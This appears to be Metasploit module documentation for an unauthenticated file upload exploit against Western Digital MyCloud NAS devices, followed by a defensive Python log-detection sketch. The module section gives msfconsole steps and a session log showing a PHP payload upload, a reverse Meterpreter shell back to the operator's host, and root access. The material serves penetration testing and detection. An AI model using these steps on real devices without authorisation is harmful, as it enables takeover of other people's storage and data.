metasploit-gs/documentation/modules/exploit/linux/http/wd_mycloud_multiupload_upload.md
2017-11-28 07:12:00 -06:00
## Description
This module exploits a file upload vulnerability found in Western Digital's MyCloud NAS web administration HTTP service. The /web/jquery/uploader/multi_uploadify.php PHP script provides multipart upload functionality that is accessible without authentication and can be used to place a file anywhere on the device's file system. This allows an attacker to upload a PHP shell onto the device and obtain arbitrary code execution as root.
## Vulnerable Application
[Western Digital](https://www.wdc.com/) designs drives and network attached storage (NAS) devices for both consumers and businesses.
This module was tested successfully on a MyCloud PR4100 with firmware version 2.30.172.
## Verification Steps
1. Do: ```use exploit/linux/http/wd_mycloud_multiupload_upload```
2. Do: ```set RHOST [IP]```
3. Do: ```check```
4. It should be reported as vulnerable
5. Do: ```run```
6. You should get a shell
## Scenarios
```
msf > use exploit/linux/http/wd_mycloud_multiupload_upload
msf exploit(wd_mycloud_multiupload_upload) > set RHOST 192.168.86.104
RHOST => 192.168.86.104
msf exploit(wd_mycloud_multiupload_upload) > check
[+] 192.168.86.104:80 The target is vulnerable.
msf exploit(wd_mycloud_multiupload_upload) > run
[*] Started reverse TCP handler on 192.168.86.215:4444
[*] Uploading PHP payload (1124 bytes) to '/var/www'.
[+] Uploaded PHP payload successfully.
[*] Making request for '/.7bc5NqFMK5.php' to execute payload.
[*] Sending stage (37543 bytes) to 192.168.86.104
[*] Meterpreter session 1 opened (192.168.86.215:4444 -> 192.168.86.104:38086) at 2017-11-28 06:07:14 -0600
[+] Deleted .7bc5NqFMK5.php
meterpreter > getuid
Server username: root (0)
```
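
For defenders, the scenario above implies two web requests worth hunting for: a POST to the uploader script named in the Description, then a request for a dot-prefixed PHP file in the web root. The following detection sketch is an added example, not part of the module or its documentation; it assumes Combined Log Format access logs and a 5-minute correlation window, and the function names and sample log lines are constructed for illustration.

```python
import re
from datetime import datetime, timedelta

UPLOAD_PATH = "/web/jquery/uploader/multi_uploadify.php"  # path from the Description
# Assumption: the access log uses Common/Combined Log Format.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" (?P<status>\d{3})'
)
# Dot-prefixed PHP file directly in the web root, as seen in the Scenarios output.
HIDDEN_PHP_RE = re.compile(r"^/\.[^/]+\.php$")
WINDOW = timedelta(minutes=5)  # assumed correlation window


def parse(line):
    """Return (ip, timestamp, method, path, status) or None for unparsable lines."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
    path = m["uri"].split("?", 1)[0]  # ignore any query string
    return m["ip"], ts, m["method"], path, int(m["status"])


def detect(lines):
    """Flag uploader POSTs, and hidden-PHP requests from the same client soon after."""
    alerts, last_upload = [], {}
    for line in lines:
        rec = parse(line)
        if rec is None:
            continue
        ip, ts, method, path, status = rec
        if method == "POST" and path == UPLOAD_PATH:
            last_upload[ip] = ts
            alerts.append(("upload_attempt", ip, path, status))
        elif HIDDEN_PHP_RE.match(path) and ip in last_upload:
            if timedelta(0) <= ts - last_upload[ip] <= WINDOW:
                alerts.append(("payload_request", ip, path, status))
    return alerts


# Constructed sample log lines (not captured from a real device).
SAMPLE = [
    '192.168.86.50 - - [28/Nov/2017:06:06:58 -0600] "GET /index.php HTTP/1.1" 200 5120',
    '192.168.86.215 - - [28/Nov/2017:06:07:13 -0600] "POST /web/jquery/uploader/multi_uploadify.php HTTP/1.1" 200 12',
    '192.168.86.215 - - [28/Nov/2017:06:07:14 -0600] "GET /.7bc5NqFMK5.php HTTP/1.1" 200 0',
    '192.168.86.50 - - [28/Nov/2017:06:07:20 -0600] "GET /.hidden.php HTTP/1.1" 404 0',
    'truncated line that does not parse',
]
```

Because the module deletes the uploaded file after the session opens, the log entries may be the only remaining evidence on disk; any `upload_attempt` on an affected firmware deserves review even without a matching `payload_request`.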